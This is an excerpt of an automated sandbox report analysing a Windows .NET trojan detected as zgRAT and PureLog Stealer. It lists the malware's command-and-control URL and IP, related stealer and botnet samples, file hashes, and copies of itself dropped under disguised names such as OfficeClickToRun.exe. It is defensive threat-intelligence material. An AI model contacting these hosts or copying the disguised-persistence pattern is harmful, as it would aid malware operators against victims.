GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2402622634.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2511025433.000000000304F000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2511025433.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2653710788.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2653710788.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2772444943.000000000373B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2772444943.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.0000000003B86000.00000004.00000800.00020000.00000000.sdmp	true	unknown
http://228472cm.n9shka.top/	GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.00000000039C1000.00000004.00000800.00020000.00000000.sdmp	true	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.44.238.250	228472cm.n9shka.top	France		49434	HARMONYHOSTING-ASFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579482
Start date and time:	2024-12-22 15:41:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	72
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vb8DOBZQ4X.exe renamed because original name is a hash value
Original Sample Name:	67EFB6282221428E7FF63B87DF2F6522.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@90/257@1/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target GSwhJpqdkmruXxiphyV.exe, PID 2000 because it is empty
Execution Graph export aborted for target GSwhJpqdkmruXxiphyV.exe, PID 5052 because it is empty
Execution Graph export aborted for target GSwhJpqdkmruXxiphyV.exe, PID 5700 because it is empty
Execution Graph export aborted for target GSwhJpqdkmruXxiphyV.exe, PID 6776 because it is empty
Execution Graph export aborted for target GSwhJpqdkmruXxiphyV.exe, PID 7128 because it is empty
Execution Graph export aborted for target vb8DOBZQ4X.exe, PID 6580 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:42:38	API Interceptor	9x Sleep call for process: GSwhJpqdkmruXxiphyV.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.44.238.250	8k1e14tjcx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	703648cm.renyash.top/provider_cpugame.php
	4si9noTBNw.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
	Qsi7IgkrWa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
	4Awb1u1GcJ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	143840cm.nyashteam.ru/DefaultPublic.php
	s5duotgoYD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
	QMT2731i8k.exe	Get hash	malicious	DCRat	Browse	117813cm.n9shteam.in/ExternalRequest.php
	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
	HcEvQKWAu2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse	452132cm.n9shteam2.top/Processdownloads.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HARMONYHOSTING-ASFR	dlr.arm7.elf	Get hash	malicious	Mirai	Browse	37.44.238.94
	dlr.mips.elf	Get hash	malicious	Mirai	Browse	37.44.238.94
	dlr.mpsl.elf	Get hash	malicious	Mirai	Browse	37.44.238.94
	dlr.arm6.elf	Get hash	malicious	Unknown	Browse	37.44.238.94
	8k1e14tjcx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	roze.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.armv4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.ppc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AGiVvpLm.log	6G8OR42xrB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	XNPOazHpXF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	9FwQYJSj4N.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	DWTukBG9R7.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	150bIjWiGH.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	wmdqEYgW2i.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	CPNSQusnwC.exe	Get hash	malicious	DCRat	Browse
	xoCq1tvPcm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	eu6OEBpBCI.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	IYXE4Uz61k.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3656704
Entropy (8bit):	7.821844595138407
Encrypted:	false
SSDEEP:	98304:wijoKCxGO1tnxHRMvCcxXue73F43f+YA:wi0KCxGO1tnVR+XV73u3WH
MD5:	67EFB6282221428E7FF63B87DF2F6522
SHA1:	D358EFB4F979B90C159B505D374F475253D04367
SHA-256:	F39E16190B3C97670DBD39C9DDADA53857C38BE6737D9F379B57D706292D5815
SHA-512:	00443A9F7DDA6D9D75D5AD39A802D66E26ACB1F2F619462BEFBE82AC12C9AB47B5D02C6A721DEA552D1BC498976AC11B4A6452F5BCFC887392ABDE49FF6F96F2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................7.........N.7.. ....8...@.. .......................@8...........@...................................7.K.....8. .................... 8...................................................... ............... ..H............text...T.7.. ....7................. ..`.rsrc... .....8.......7.............@....reloc....... 8.......7.............@..B................0.7.....H.......T...$...........x.....,.u.7......................................0..........(.... ........8........E.......N...).......8%...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....t...........P...`...8o...~....(V... .... .... ....s....~....(Z....... ....~....{....:....& ....8.......... ....8....~....:V... ....8s.......~....(^...~....(b... ....?*... ....~....{h...:=...& ....82...

C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Windows Sidebar\Gadgets\GSwhJpqdkmruXxiphyV.exe

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3656704
Entropy (8bit):	7.821844595138407
Encrypted:	false
SSDEEP:	98304:wijoKCxGO1tnxHRMvCcxXue73F43f+YA:wi0KCxGO1tnVR+XV73u3WH
MD5:	67EFB6282221428E7FF63B87DF2F6522
SHA1:	D358EFB4F979B90C159B505D374F475253D04367
SHA-256:	F39E16190B3C97670DBD39C9DDADA53857C38BE6737D9F379B57D706292D5815
SHA-512:	00443A9F7DDA6D9D75D5AD39A802D66E26ACB1F2F619462BEFBE82AC12C9AB47B5D02C6A721DEA552D1BC498976AC11B4A6452F5BCFC887392ABDE49FF6F96F2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................7.........N.7.. ....8...@.. .......................@8...........@...................................7.K.....8. .................... 8...................................................... ............... ..H............text...T.7.. ....7................. ..`.rsrc... .....8.......7.............@....reloc....... 8.......7.............@..B................0.7.....H.......T...$...........x.....,.u.7......................................0..........(.... ........8........E.......N...).......8%...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....t...........P...`...8o...~....(V... .... .... ....s....~....(Z....... ....~....{....:....& ....8.......... ....8....~....:V... ....8s.......~....(^...~....(b... ....?*... ....~....{h...:=...& ....82...

C:\Program Files (x86)\Windows Sidebar\Gadgets\GSwhJpqdkmruXxiphyV.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Windows Sidebar\Gadgets\ebad0b34ee7c31

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.838799354007085
Encrypted:	false
SSDEEP:	6:18cJ/OoX4SrUuSd1l9wL4POB1nycZWUQOs3z2RwTc1RfbPqUTDGWpOO:RZ9X4Tb1li4eJpWLb3z2WORfVTDVpb
MD5:	75FC66E37FEF2271D197C3A3CBA56A66
SHA1:	273FD9485DD35D1F960B937CD3F8950A7C504929
SHA-256:	873FB845214F158D03C50C3D85E0C9BA27EFD65B9F203D5FFBF1A5AA52E7807B
SHA-512:	C8840AF68541B9EB48810DD310D8CCC829923D19F2A02491C448ACCC30A81C4A0A3C410935BCC3E128905C7646870DA37AEA7964493934A52E6022B7C0F200AF
Malicious:	false
Preview:	6k5btJ3F5gyH9dWeacdVwtgoLSEGDmpVesPk97qvkJugpwADozw6c8jMERPbFwBS1cnROvecwsvm9A9ZRAcO0t3gJCgsrPqxIboMJty3UTKuN6NES0JEUwcIjGHMPwugB8diVwPiLi3gjJSMyba1FlcV8gmClmniinsPcptfkl2v26jay5YxV3aafHjyJN6j5V75aDtIs4QesqdB7MOqNzMpMStUF5VXpT0h9n9uMPFbn6ryoi079QVFIRsITYDwi2zZz5CUNde8uvCQl5qhEYYY7vZr41bxLS2uGR8tggtfwWUWPbhYsfsJeacEfUZWCqwb3RKT66Bip2mkaCbcTCFqksQq

C:\Program Files (x86)\Windows Sidebar\ebad0b34ee7c31

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	136
Entropy (8bit):	5.611036462430697
Encrypted:	false
SSDEEP:	3:FS1e6TVziSzweoT0dDXWytJF6uPXqoV32/jBnp/LtOO7fU9wQ25n:o1zjNO0NXUOMxR5ZM61
MD5:	3240149E0B25B10DD349C38BADDD1AD4
SHA1:	9255B197FDEAA304570CE6023D29FCF55B32B1A5
SHA-256:	D74419FD391BF1323DABC5A006B5A1EC0460D8707613FEA66AFF04822BF27296
SHA-512:	6E4895A6FA8796E23F8038570E6EF4BF31FB88EFF13F6AF09F178826D615B35435C2DE3FD26A67597616EF8F344D2FC84C0510729634F9D3E81861EE43393B28
Malicious:	false
Preview:	STIt7xtvQ9bIZ4yhOqeITvVNS7VqLZ3MGruj5AvQxI6jW2XcE0iqgyyh85bAcCj1FPBrJPlN5NULzw0aj2lU0MpR3NlAjuxuiFdH0qTzOVvSenrMEAbkaOB2jtx5nloLajmuStj2

C:\Program Files (x86)\jDownloader\config\GSwhJpqdkmruXxiphyV.exe

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3656704
Entropy (8bit):	7.821844595138407
Encrypted:	false
SSDEEP:	98304:wijoKCxGO1tnxHRMvCcxXue73F43f+YA:wi0KCxGO1tnVR+XV73u3WH
MD5:	67EFB6282221428E7FF63B87DF2F6522
SHA1:	D358EFB4F979B90C159B505D374F475253D04367
SHA-256:	F39E16190B3C97670DBD39C9DDADA53857C38BE6737D9F379B57D706292D5815
SHA-512:	00443A9F7DDA6D9D75D5AD39A802D66E26ACB1F2F619462BEFBE82AC12C9AB47B5D02C6A721DEA552D1BC498976AC11B4A6452F5BCFC887392ABDE49FF6F96F2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................7.........N.7.. ....8...@.. .......................@8...........@...................................7.K.....8. .................... 8...................................................... ............... ..H............text...T.7.. ....7................. ..`.rsrc... .....8.......7.............@....reloc....... 8.......7.............@..B................0.7.....H.......T...$...........x.....,.u.7......................................0..........(.... ........8........E.......N...).......8%...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....t...........P...`...8o...~....(V... .... .... ....s....~....(Z....... ....~....{....:....& ....8.......... ....8....~....:V... ....8s.......~....(^...~....(b... ....?*... ....~....{h...:=...& ....82...

C:\Program Files (x86)\jDownloader\config\GSwhJpqdkmruXxiphyV.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\jDownloader\config\ebad0b34ee7c31

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with very long lines (920), with no line terminators
Category:	dropped
Size (bytes):	920
Entropy (8bit):	5.913950614918812
Encrypted:	false
SSDEEP:	24:99HyhxyKrVqh9gDO5DoLrJSMwT26emMXVw6P6t:Yxy6VqhqthDwS1St
MD5:	7DAF479A67CF5DDA3BC28CE8EE4A3EC7
SHA1:	D5E7F30F2BC383B50DB3BFEB9BF72AF2ED7FB6F2
SHA-256:	98997D4871176B4FA20570740484E7090C4DA958DE30604BC89B15A0E6E7B356
SHA-512:	F8E996BFB713668CDD7DFF774AAE2610CFFBED693EEE5D7A04642EBBD526A284C8165CC3E7A4CB8AA5D2E02B9170741F956BCC07BF125D899D897A8DDB6AFE45
Malicious:	false
Preview:	iSNUTDlhG2XMnrj24B73VaiApIgaN6hZOqF2MPSqrLdAMjcx1d2PifjHuMoLhKTKU786mrqosRMK7iyFqtjuDS1sH7I9kHIg1TpOlfLKxNgRSYKLYjeyljGCGPzojqElIpSo3jdKhY7zwjZsx6lBmU5SMnHVqglGJ4ImGfSyFUQMmQPgzH1mFD9xuAbQbIeBx0p1bwlRow5REtp6Xlfjp8AG5U2GECW70PYwkYFCfk8THrtBUf20m4Vzzj5G4fNlZ7bzU3V9fdDF9r8Ol1wiJgV53j6Bc9I9XW3KP4qaK3UJ1Q0HlqeCtoc3mf5u7UggUDsmyy8qKVYQLMEmtyaweFQs4Aiu85d0XxyxiNTwry1XPMrZbTBI3uCOx9sxQOsO2i3XXRDfenEqN2dsSITp4U6nvj9jffgcFnfqTTCJPfnQpWA4fAeI5CUhmPmxReA9GlkkWwZ9GJaYqp7ZiEDfAYhDS8EDqO1ueoJEvahskfBwm606SNPMaf8sEhSYsVS1Rp3Cg3nIgU4fWvaVHIvd8oT9qb9OHJAPNJe7CyaYjGqGldVTG6Rkky3nV4VE3ZAXTpSMQdTSrW428NXNGqIL1aoYQ1lIcVeKFSw6KICnn82O4AoHgI8NRzg3A35Z1KzV1uwqbaC7oeh3iadQMdlUXR3Qw25RMnvcIgWKN7qFGAjwRmVkZpMXif8k0g4ievuAtFuBETCOxgNWsG8JhV1haY4mivTrDHkVPiDM2TgGn7jCSl2uhvBJ3NkULHcSAULq52HJDwQNzv4cy1U73jKSGbbC8sBu1NFSw3HZesquexTITHgTwfYaK2jdbELVvgWlplq4t5cL2ZySHSs0Lr7VzpI4Un8ZgV97asdrbmj1DMiuEQVJWVJDiBwAdvkG7Dpha02ZyAZiHGSmGY0DRzDLL5ZZ

C:\Users\Default\Saved Games\OfficeClickToRun.exe

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3656704
Entropy (8bit):	7.821844595138407
Encrypted:	false
SSDEEP:	98304:wijoKCxGO1tnxHRMvCcxXue73F43f+YA:wi0KCxGO1tnVR+XV73u3WH
MD5:	67EFB6282221428E7FF63B87DF2F6522
SHA1:	D358EFB4F979B90C159B505D374F475253D04367
SHA-256:	F39E16190B3C97670DBD39C9DDADA53857C38BE6737D9F379B57D706292D5815
SHA-512:	00443A9F7DDA6D9D75D5AD39A802D66E26ACB1F2F619462BEFBE82AC12C9AB47B5D02C6A721DEA552D1BC498976AC11B4A6452F5BCFC887392ABDE49FF6F96F2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................7.........N.7.. ....8...@.. .......................@8...........@...................................7.K.....8. .................... 8...................................................... ............... ..H............text...T.7.. ....7................. ..`.rsrc... .....8.......7.............@....reloc....... 8.......7.............@..B................0.7.....H.......T...$...........x.....,.u.7......................................0..........(.... ........8........E.......N...).......8%...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....t...........P...`...8o...~....(V... .... .... ....s....~....(Z....... ....~....{....:....& ....8.......... ....8....~....:V... ....8s.......~....(^...~....(b... ....?*... ....~....{h...:=...& ....82...

C:\Users\Default\Saved Games\OfficeClickToRun.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\Saved Games\e6c9b481da804f

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with very long lines (413), with no line terminators
Category:	dropped
Size (bytes):	413
Entropy (8bit):	5.871726670976329
Encrypted:	false
SSDEEP:	12:dekT3ZyxBZINYC0Ydj0hzUwTzTkcEGUtL6bsa/bL:dewU9gdj0hzUKyft8t/3
MD5:	B488932072132975372AEED2B718A3E3
SHA1:	8CAC94E5E89E0A5FE0E1A5B31DF1791066E4A0B7
SHA-256:	040AC42B168AF43BFE58D65BC473408890D01C59F9E998027A7C2B8D8939A9B1
SHA-512:	5AF4177D42EA0705EC842FEB5B2DA5696A3ADDEE86229431929725098C81C591A041A13478BFC6D30C4305F33CAF86AF07DA14D341C74BD2FC1DD93B4C380D60
Malicious:	false
Preview:	m2PJx2ydsEqfBVta0kvcL8C294NOhBBnPUNkes6MLMmiJgvdfr3vrSNo0XK2pj6rCDQqII5HojR9VescJut0HP56GiuHiDgmQ5fGQEUWvwHIBOSWoss50FkwHTkjYyjkCosa8mMFZWEUIx41QXc0VlwKUs86dv87NgFXg1XBfnfdAPoTZsSAVsPb2hGQnPloXHHmrhVZAbUrFSJEEphvc7leQoe8vHYPC1F3ICm1W3A4YiWkYBM8szLafnVDDXo3CEpNMQ6BCpYi7rFsS4jt4ZhMppXfqjy8PG1U2IXHFK5CbncyhmuIx48nhchg3aUd1ZS0zvzJgcnudevCMi8EypLUIOwak1OpzcLBUm9vwkmVROJCrfTUcQoLO7sl8ZjpN84BStrkjMRNDzD3EusEh4MixAwW3

C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3656704
Entropy (8bit):	7.821844595138407
Encrypted:	false
SSDEEP:	98304:wijoKCxGO1tnxHRMvCcxXue73F43f+YA:wi0KCxGO1tnVR+XV73u3WH
MD5:	67EFB6282221428E7FF63B87DF2F6522
SHA1:	D358EFB4F979B90C159B505D374F475253D04367
SHA-256:	F39E16190B3C97670DBD39C9DDADA53857C38BE6737D9F379B57D706292D5815
SHA-512:	00443A9F7DDA6D9D75D5AD39A802D66E26ACB1F2F619462BEFBE82AC12C9AB47B5D02C6A721DEA552D1BC498976AC11B4A6452F5BCFC887392ABDE49FF6F96F2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................7.........N.7.. ....8...@.. .......................@8...........@...................................7.K.....8. .................... 8...................................................... ............... ..H............text...T.7.. ....7................. ..`.rsrc... .....8.......7.............@....reloc....... 8.......7.............@..B................0.7.....H.......T...$...........x.....,.u.7......................................0..........(.... ........8........E.......N...).......8%...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....t...........P...`...8o...~....(V... .... .... ....s....~....(Z....... ....~....{....:....& ....8.......... ....8....~....:V... ....8s.......~....(^...~....(b... ....?*... ....~....{h...:=...& ....82...

C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Public\Documents\ebad0b34ee7c31

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	ASCII text, with very long lines (418), with no line terminators
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.832780369527501
Encrypted:	false
SSDEEP:	12:Hgwk9C0XR2gKP2zkoyWgIARjWX+SOOxp4bS:5k9CaZptyWK0+pkmm
MD5:	967DC909C7277756962DF6C0DF038344
SHA1:	8446806C187FF60F1889F4D29F59ADBAB40F7A10
SHA-256:	73CB23E69F93E8035A5560F00220660A08F278FF4ECFC1D048AC94F022D4A031
SHA-512:	0D68533CC0C2194DEECAC29615EC3386217151595840261F123F891137DCF4245D06868D143DB2A3A4782594BCA63B2DD0A6D28746FD475F285ECB89A8F5E348
Malicious:	false
